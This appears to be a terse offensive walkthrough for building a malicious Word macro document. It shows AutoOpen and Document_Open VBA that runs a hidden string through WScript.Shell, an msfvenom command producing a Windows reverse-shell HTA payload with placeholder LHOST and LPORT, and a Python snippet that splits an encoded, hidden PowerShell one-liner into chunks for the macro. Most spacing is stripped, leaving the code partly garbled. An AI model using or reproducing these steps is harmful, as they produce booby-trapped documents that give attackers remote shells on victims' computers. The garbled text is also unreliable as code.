OpenWordDocument→View→Macros→MacroName:MyMacro→Macrosin:Document(1) →CreateSaveitinonly.docmor.docformat.docxisnotsupported.# Paste this Snippet in Macro.SubAutoOpen()MyMacroEndSubSubDocument_Open()MyMacroEndSubSubMyMacro()DimStrAsStringCreateObject("Wscript.Shell").Run StrEndSub# Save as Word 97-2003 Document Template
One more step is having Split Powershell one-liner for the reverse shell, so we have 3 step process:
1) msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port>-fhta-psh-oevil.hta# read evil.hta and copy the powershell.exe string 2) Put the Powershell script in a Python code below for splittingstr="powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."n=50for i inrange(0,len(str),n):print"Str = Str + "+'"'+str[i:i+n]+'"'3) Copy the split and paste it in Macro (belowDimstrandaboveCreateObject)